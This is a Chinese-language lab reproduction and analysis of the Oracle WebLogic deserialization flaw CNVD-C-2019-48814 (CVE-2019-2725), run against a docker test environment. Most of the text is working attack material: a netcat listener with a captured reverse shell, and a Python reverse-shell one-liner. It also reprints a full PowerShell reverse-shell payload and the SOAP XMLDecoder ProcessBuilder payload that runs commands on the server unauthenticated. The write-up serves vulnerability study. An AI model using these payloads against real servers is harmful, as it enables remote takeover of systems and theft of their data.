CNVD-C-2019-48814复现

docker搭建环境：

docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest
http://localhost:49163/console
User: weblogic
Pass: welcome1

漏洞验证：登入->http://xx.xx.xx.xxx:49163/_async/AsyncResponseService

若出现如上述页面则可确定漏洞基本存在

poc：https://github.com/fuhei/CNVD-C-2019-48814/blob/master/CNVD-C-2019-48814.py
验证方式：
在攻击机开启本地监听，nc -lvvp 2333
调用脚本：

1	python poc.py -l 192.168.10.144 -p 2333 -r http://192.168.10.145:49163

这里似乎如果将监听地址写为127.0.0.1是不行的，只能改为在内网中的地址，拿到shell

listening on [any] 2333 …
192.168.10.145: inverse host lookup failed: Unknown host
connect to [192.168.10.144] from (UNKNOWN) [192.168.10.145] 36844
sh: no job control in this shell
sh-4.2$ whoami
whoami
oracle
sh-4.2$ ls
ls
autodeploy
bin
common
config
console-ext
derby.log
fileRealm.properties
init-info
lib
nodemanager
security
servers
startWebLogic.sh
sh-4.2$

漏洞描述：

Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server

poc分析：

1	def __init__(self, check, rhost, lhost, lport, windows):

url检查，测定漏洞点存在与否
目标地址，监听地址和端口
windows则是检查目标的操作系统，默认为unix，若为windows则要添加参数
unix或linux下的shell生成方式：

self.cmd_payload = (
    "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket."
    "SOCK_STREAM);s.connect((\"{lhost}\",{lport}));os.dup2(s.fileno(),0); os.dup2("
    "s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
).format(lhost=self.lhost, lport=self.lport)

windows下shell生成：

self.cmd_payload = (
    r"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) "
    r"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='" + self.lhost +""
    r"';$p='"+ self.lport + "';$c=New-Object system.net.sockets.tcpclient;$c.connect($a"
    r",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"
    r"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"
    r"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"
    r"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"
    r"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"
    r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};"
    r"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;"
    r"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)"
    r" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;"
    r"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};"
    r"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if "
    r"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne"
    r" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e."
    r"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};"

exp部分：

def get_process_builder_payload(self):
        process_builder_payload = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
    <soapenv:Header> 
        <wsa:Action>xx</wsa:Action>
        <wsa:RelatesTo>xx</wsa:RelatesTo>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
            <void class="java.lang.ProcessBuilder">
                <array class="java.lang.String" length="3">
                    <void index="0">
                        <string>{cmd_base}</string>
                    </void>
                    <void index="1">
                        <string>{cmd_opt}</string>
                    </void>
                    <void index="2">
                        <string>{cmd_payload}</string>
                    </void>
                </array>
            <void method="start"/></void>
        </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body>
    <asy:onAsyncDelivery/>
    </soapenv:Body>
</soapenv:Envelope>'''
        return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),
                                      cmd_payload=self.cmd_payload)

执行的具体流程：

分析参考：
https://paper.seebug.org/909/#417
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725
http://pupiles.com/xmldecoder.html

复现参考：
https://www.o2oxy.cn/2204.html